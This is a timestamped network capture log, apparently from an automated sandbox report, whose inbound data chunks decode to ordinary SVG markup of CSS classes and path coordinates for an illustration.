2023-03-22 04:45:54 UTC	1355	IN	Data Raw: 31 36 38 7b 66 69 6c 6c 3a 23 66 35 64 61 32 38 3b 7d 2e 63 6c 73 2d 31 36 30 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a Data Ascii: 168{fill:#f5da28;}.cls-160{stroke-width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:
2023-03-22 04:45:54 UTC	1371	IN	Data Raw: 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 Data Ascii: 25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1
2023-03-22 04:45:54 UTC	1387	IN	Data Raw: 38 39 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c Data Ascii: 89,0,2.1,2.1,0,0,1,.16,2.85"/><path class="cls-4" d="M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,
2023-03-22 04:45:54 UTC	1403	IN	Data Raw: 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 Data Ascii: 27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0
2023-03-22 04:45:54 UTC	1419	IN	Data Raw: 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 Data Ascii: .51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27
2023-03-22 04:45:55 UTC	1435	IN	Data Raw: 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 Data Ascii: 2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4
2023-03-22 04:45:55 UTC	1451	IN	Data Raw: 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 Data Ascii: .52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path
2023-03-22 04:45:55 UTC	1467	IN	Data Raw: 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 Data Ascii: 1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12
2023-03-22 04:45:55 UTC	1483	IN	Data Raw: 22 20 64 3d 22 4d 38 37 39 2e 37 34 2c 32 39 39 2e 37 37 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 37 39 2c 33 30 32 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c Data Ascii: " d="M879.74,299.77A1.72,1.72,0,0,1,879,302a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,
2023-03-22 04:45:55 UTC	1499	IN	Data Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 36 35 2c 31 37 34 2e 32 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e Data Ascii: "/><path class="cls-4" d="M896.65,174.25a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.
2023-03-22 04:45:55 UTC	1515	IN	Data Raw: 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 Data Ascii: .12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M927.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2
2023-03-22 04:45:55 UTC	1531	IN	Data Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 36 2e 38 38 2c 31 36 33 2e 37 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 Data Ascii: ><path class="cls-4" d="M1026.88,163.74a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38
2023-03-22 04:45:55 UTC	1547	IN	Data Raw: 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 34 36 2c 32 39 34 2e 31 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c Data Ascii: 6-2.82"/><path class="cls-4" d="M1010.46,294.18a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,
2023-03-22 04:45:55 UTC	1563	IN	Data Raw: 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 Data Ascii: 6,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09
2023-03-22 04:45:55 UTC	1579	IN	Data Raw: 2c 31 38 30 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 Data Ascii: ,180a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85
2023-03-22 04:45:55 UTC	1595	IN	Data Raw: 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c Data Ascii: 1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,
2023-03-22 04:45:55 UTC	1611	IN	Data Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 Data Ascii: 2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><pa
2023-03-22 04:45:55 UTC	1627	IN	Data Raw: 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 34 31 2c 32 30 33 2e 30 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c Data Ascii: 